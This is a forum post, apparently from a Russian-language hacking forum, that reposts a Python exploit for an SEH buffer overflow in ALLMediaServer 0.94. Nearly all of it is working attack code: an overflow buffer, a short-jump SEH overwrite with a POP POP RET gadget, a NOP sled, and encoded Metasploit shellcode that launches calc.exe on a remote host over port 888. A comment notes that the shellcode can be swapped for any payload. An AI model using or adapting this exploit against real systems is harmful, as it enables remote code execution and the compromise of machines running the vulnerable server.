• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote ALLMediaServer 0.94 SEH Overflow

DarckSol

(L1) cache
Пользователь
Регистрация
17.03.2008
Сообщения
894
Реакции
182
ALLMediaServer version 0.94 SEH overflow exploit that spawns calc.exe.

Код:
#!/usr/bin/python
import socket, sys

##############################################################
# Exploit Title: ALLMediaServer 0.94 SEH Overflow Exploit
# Date: 07/03/2013
# Exploit Author: metacom
# E-mail:metacom27@gmail.com
# Software Link:http://allmediaserver.org/download
# Version: ALLMediaServer 0.94
# Tested On: Windows 7 German
#ALLMediaServer run online mod 
##############################################################
#"Usage: allmediaserver.py <ip>"
host = sys.argv[1]

buffer = "http://" + "\x41" * 1065

nseh = "\xEB\x06\x90\x90"    # Short Jump  

seh = "\xCA\x24\xEC\x65"       #POP POP RET 0x65EC24CA   avcodec-53.dll

nop = "\x90" * 50
#msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00' -e x86/shikata_ga_nai -t c
# you can replace the shellcode with any shellcode u want
shell = ("\xb8\x66\xa5\xa3\x41\xdb\xd5\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x33\x31\x43\x12\x83\xc3\x04\x03\x25\xab\x41\xb4\x55\x5b\x0c"
"\x37\xa5\x9c\x6f\xb1\x40\xad\xbd\xa5\x01\x9c\x71\xad\x47\x2d"
"\xf9\xe3\x73\xa6\x8f\x2b\x74\x0f\x25\x0a\xbb\x90\x8b\x92\x17"
"\x52\x8d\x6e\x65\x87\x6d\x4e\xa6\xda\x6c\x97\xda\x15\x3c\x40"
"\x91\x84\xd1\xe5\xe7\x14\xd3\x29\x6c\x24\xab\x4c\xb2\xd1\x01"
"\x4e\xe2\x4a\x1d\x18\x1a\xe0\x79\xb9\x1b\x25\x9a\x85\x52\x42"
"\x69\x7d\x65\x82\xa3\x7e\x54\xea\x68\x41\x59\xe7\x71\x85\x5d"
"\x18\x04\xfd\x9e\xa5\x1f\xc6\xdd\x71\x95\xdb\x45\xf1\x0d\x38"
"\x74\xd6\xc8\xcb\x7a\x93\x9f\x94\x9e\x22\x73\xaf\x9a\xaf\x72"
"\x60\x2b\xeb\x50\xa4\x70\xaf\xf9\xfd\xdc\x1e\x05\x1d\xb8\xff"
"\xa3\x55\x2a\xeb\xd2\x37\x20\xea\x57\x42\x0d\xec\x67\x4d\x3d"
"\x85\x56\xc6\xd2\xd2\x66\x0d\x97\x2d\x2d\x0c\xb1\xa5\xe8\xc4"
"\x80\xab\x0a\x33\xc6\xd5\x88\xb6\xb6\x21\x90\xb2\xb3\x6e\x16"
"\x2e\xc9\xff\xf3\x50\x7e\xff\xd1\x32\xe1\x93\xba\x9a\x84\x13"
"\x58\xe3")


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 888)) #default port
s.send(buffer+nseh+seh+nop+shell)
print "Exploit sent! Open Calc :)\n"
s.close()
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх